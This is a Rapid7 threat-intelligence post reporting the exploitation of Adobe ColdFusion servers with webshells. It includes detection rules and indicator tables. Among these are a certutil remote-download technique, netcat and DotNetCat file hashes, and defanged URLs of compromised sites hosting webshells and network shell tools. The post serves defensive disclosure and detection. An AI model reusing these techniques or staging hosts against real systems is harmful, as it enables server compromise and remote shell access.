Last updated at Tue, 27 Feb 2024 17:17:29 GMT
Note: While Rapid7 did not definitively tie the attacker behavior in this blog to a specific CVE at time of publication, as of December 2023 we have observed multiple instances of exploitation of Adobe ColdFusion CVE-2023-26360 for initial access, as well as exploitation of ColdFusion CVE-2023-29300, CVE-2023-29298, and CVE-2023-38203.
Rapid7’s Threat Intelligence and Detection Engineering team has identified active exploitation of Adobe ColdFusion in multiple customer environments. The observed activity dates back to January 2023. IOCs are included below.
Rapid7 has existing detection rules within InsightIDR that have identified this activity and have created additional rules based upon this observed behavior. We have also observed the compromised website, ooshirts[.]com, being used in other attacks dating back to March 2022.
Attacker Behavior
The earliest time frame of compromise identified thus far occurred in early January 2023. Rapid7 discovered evidence indicating that a malicious actor dropped webshells using an encoded PowerShell command. Process start data indicates that ColdFusion 2018 is spawning malicious commands.
Example base64 encoded command executed by malicious actor through ColdFusion:
Decoded:
Rapid7 Customers
In our current investigations, previously existing and new detections have been observed triggering post exploitation across Rapid7 InsightIDR and Managed Detection & Response (MDR) customers:
Webshell – Possible ColdFusion Webshell In Command Line
This detection identifies common ColdFusion tags being passed in the command line. This technique is used by malicious actors when redirecting strings into files when creating webshells.
Attacker Technique – CertUtil With URLCache Flag
This detection identifies the use of the ‘certutil.exe’ binary with the ‘-urlcache’ flag being passed to it. This technique is used by malicious actors to retrieve files hosted on a remote web server and write them to disk.
Indicators of Compromise
This technique has been observed by malicious actors redirecting strings into files while creating webshells. Look for *.cfm files in ColdFusion webroots containing the following ColdFusion tags:
- <cfexecute>
- </cfexecute>
Review process start logs for any abnormal child processes of ColdFusion Server
File items:
| Type | Value | Notes |
|---|---|---|
| Filename | WOW.TXT | ColdFusion WebShell |
| Filename | wow.txt | ColdFusion WebShell |
| Filename | www.txt | ColdFusion WebShell |
| Filename | www.cfm | ColdFusion WebShell |
| Filename | wow1.cfm | ColdFusion WebShell |
| Filename | zzz.txt | ColdFusion WebShell |
| Filename | dncat.exe | DotNetCat |
| Filename | nc.exe | NetCat |
| SHA-256 | e77d6a10370db19b97cacaeb6662ba79f34087d6eaa46f997ea4956e2ad2f245 | ColdFusion WebShell |
| SHA-256 | 2482ab79ecb52e1c820ead170474914761358d3cee16e3377fd6e031d3e6cc25 | ColdFusion WebShell |
| SHA-256 | 03b06d600fae4f27f6a008a052ea6ee4274652ab0d0921f97cfa222870b1ddc3 | ColdFusion WebShell |
| SHA-256 | be56f5ed8e577e47fef4e0a287051718599ca040c98b6b107c403b3c9d3ee148 | ColdFusion WebShell |
| MD5 | 1edf1d653deb9001565b5eff3e50824a | DotNetCat |
| SHA-1 | 5d95fb365b9d0ceb568bb0c75cb1d70707723f27 | DotNetCat |
| SHA-256 | 213079ef54d225c4ca75dd0d57c931bdc613e8c89a2d0dbff88be5b446d231f0 | DotNetCat |
| MD5 | 470797a25a6b21d0a46f82968fd6a184 | NetCat |
| SHA-1 | dac7867ee642a65262e153147552befb0b45b036 | NetCat |
| SHA-256 | ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419 | NetCat |
Network-based indicators:
| Type | Value | Notes |
|---|---|---|
| FQDN | www.av-iq[.]com | Legitimate Compromised Domain |
| FQDN | www.ooshirts[.]com | Legitimate Compromised Domain |
| URL | hXXps://www.av-iq[.]com/wow.txt | ColdFusion WebShell |
| URL | hXXps://www.ooshirts[.]com/images/zzz.txt | ColdFusion WebShell |
| URL | hXXps://www.ooshirts[.]com/images/dncat.exe | DotNetCat |
| URL | hXXp://www.ooshirts[.]com/images/nc.exe | NetCat |
MITRE ATT&CK Tactic/Technique/Subtechniques
TA0042 Resource Development (tactic):
- T1584 Compromise Infrastructure (technique)
- T1584.004 Server (sub-technique)
TA0001 Initial Access (tactic):
- T1190 Exploit Public Facing Application (technique)
TA0002 Execution (tactic):
- T1059 Command and Scripting Interpreter (technique)
- T1059.001 PowerShell (sub-technique)
- T1059.003 Windows Command Shell (sub-technique)
TA0003 Persistence (tactic):
- T1505 Server Software Component (technique)
- T1505.003 Web Shell (sub-technique)
TA0011 Command & Control (tactic):
- T1132 Data Encoding (technique)
- T1132.001 Standard Encoding (sub-technique)
- T1572 Protocol Tunneling (technique)
Mitigation Guidance
While we have not tied this behavior back to exploitation of a specific CVE, Adobe released patches for known vulnerabilities in ColdFusion on March 14, 2023. At least one of the CVEs patched in version 16 (ColdFusion 2018) and version 6 (ColdFusion 2021) is known to be exploited in the wild. Rapid7’s vulnerability research team has successfully chained CVE-2023-26359 and CVE-2023-26360 for unauthenticated remote code execution; in-depth analysis and proof-of-concept code is available in AttackerKB here.
We strongly advise ColdFusion customers to update to the latest version to remediate known risk, regardless of whether the behavior we have detailed in this blog is related to recent vulnerabilities. We also advise customers to examine their environments for signs of compromise.
InsightVM and Nexpose customers are able to assess their exposure to known Adobe ColdFusion vulnerabilities via recurring vulnerability check coverage.
Eoin Miller contributed to this article.
Source: https://www.rapid7.com/blog/post/2023/03/21/etr-rapid7-observed-exploitation-of-adobe-coldfusion/